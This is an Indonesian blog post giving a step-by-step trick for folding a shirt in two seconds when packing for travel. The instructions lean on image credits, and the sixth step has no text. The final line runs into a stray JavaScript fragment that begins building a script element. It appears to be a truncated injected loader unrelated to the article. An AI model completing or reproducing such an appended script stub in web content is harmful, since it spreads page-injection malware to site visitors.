Mau Traveling Tapi Males Lipat Baju? Ini Tips Cara Melipat Bajumu HANYA dengan 2 Detik

Traveling adalah salah satu aktivitas yang membutuhkan perencanaan baik itu budgetnya maupun detail perjalanannya. Kadang sih ada satu hal yang paling bikin males traveler sebelum jalan-jalan, apalagi kalau bukan packing! Packing itu hal yang ibaratnya “malesin” banget! Kalau kamu orangnya simpel dan nggak terlalu peduli bawaan tentu bukan masalah berarti. Nah, tapi kalau kamu tipe traveler rempong yang harus detail dan well prepare masalah bawaan, informasi ini bakal berguna buat kamu. Trik cepat melipat baju pasti akan kamu butuhkan banget ya.

Ya gimana lagi, hampir sebagian besar isi ransel atau koper kamu yang mau traveling tentu berisi baju bukan? Dan kadang masalah baju bisa bikin kesel, entah karena melipatnya lama dan nggak bagus. Juga bajunya pengen dibawa semua dan koper atau ranselnya nggak muat. Huh! Menyebalkan banget kan. Apalagi kalau cewek rempong yang mau traveling wahhh sebel banget deh itu..

Nah untuk mengatasi itu aku share cara melipat baju dalam 2 detik saja. Wah, serius? Iya dong, kamu cuma butuh waktu 2 detik untuk melipat baju kamu. Packing pun bisa lebih cepat pastinya!

  1. Langkah pertama

Langkah pertama adalah buat garis imajiner yang seperti membelah baju. Satu garis horizontal di tengah dan satu garis vertikal yang agak di bagian kiri. Karena akan menjadi garis lipatan baju. Catet ya, garis imajiner ini cuma dalam bayangan kamu aja. Nggak perlu kamu gambar-gambarin juga. Hehehe.

Sumber: www.bersosial.com
  1. Langkah kedua

Langkah selanjutnya adalah ciptakan 3 titik A, B, dan C di mana B paling atas, A di tengah dan C paling bawah. Kamu harus ingat betul 3 titik ini, karena cuma titik A, B, C inilah yang bakal kita gunakan. Jangan lupa nggak perlu baju kamu ditulisin A, B, C, cukup dibayangin aja.

Sumber: www.bersosial.com
  1. Langkah ketiga

Kemudian angkat titik A dan B secara bersamaan ya. Sesuai huruf dan garis imajiner yang sudah ada dalam bayangan kamu tadi. Titik B pake tangan kanan, titik A pake tangan kiri.

Sumber: www.bersosial.com
  1. Langkah keempat

Tarik lipatan dari titik B ke titik C, kalau belum lancar, ya pelan-pelan saja.

Sumber: www.bersosial.com

5. Langkah kelima

Kemudian angkat dan lipat semuanya secara bersamaan.

Sumber: www.bersosial.com

6. Langkah keenam

Sumber: www.bersosial.com

Horee, jadi deh lipatan bajunya. Nggak susah kan? Giliran kalian deh sekarang cobain cara mudah ini! Selamat mencoba melipat baju!var d=document;var s=d.createElement(‘script’);